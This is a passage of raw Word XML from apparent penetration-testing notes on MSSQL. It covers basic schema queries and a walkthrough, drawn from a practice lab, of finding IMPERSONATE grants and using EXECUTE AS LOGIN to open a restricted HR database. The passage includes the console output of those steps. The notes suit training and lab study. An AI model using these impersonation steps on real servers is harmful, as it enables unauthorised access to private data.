      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command beforehand)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM INFORMATION_SCHEMA.TABLES;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001920">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View Columns of a Specific Table Replace [table_name] with the table of interest:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001921">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT COLUMN_NAME, DATA_TYPE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001922">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM INFORMATION_SCHEMA.COLUMNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001923">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE TABLE_NAME = '[table_name]';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001924">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001925">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001926">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001927">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001928">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Querying Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001929">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieve All Data from a Table Replace [table_name] with your target table:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM [table_name];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter Data Add WHERE clauses to refine your queries:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM [table_name] WHERE [column_name] = 'value';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000192F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001930">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Count Rows in a Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT COUNT(*) FROM [table_name];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001932">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001933">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001934">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rphcz16acuje" w:id="203"/>
      <w:bookmarkEnd w:id="203"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to impersonate other users on mssql to access databases you don't have access to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001935">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001936">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId519">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hokkaido</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we learned this very interesting technique to look at mssql databases that you don't have access to. For example, if you see this error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001937">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL (HAERO\discovery  guest@master)&gt; use hrappdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001938">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001939">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then that means you (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HAERO\discovery</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) don't have the permissions to see the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrappdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" database. But, we can see if we can impersonate another mssql user to view this database!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it works, you should see something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000193F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name            </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001940">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--------------  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001941">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrappdb-reader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001942">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001943">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means you can impersonate the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrappdb-reader</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001944">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001945">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lets login as that user (in mssql) and use hrappdb database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001946">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001947">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL (HAERO\discovery  guest@master)&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE AS LOGIN = 'hrappdb-reader'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001948">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL (hrappdb-reader  guest@master)&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> use hrappdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001949">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000194A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and we got successful. let view the data:</w:t>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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;</w:t>
      </w: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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001951">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And feel free to add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrappdb-reader</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to some username list since it might be an AD user or a user for another service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001952">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001953">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001954">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001955">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m05c9bw5vddq" w:id="204"/>
      <w:bookmarkEnd w:id="204"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nxc and mssql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001956">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001957">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use nxc to check connection with mssql (default is domain authentication, like DOMAIN\user):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
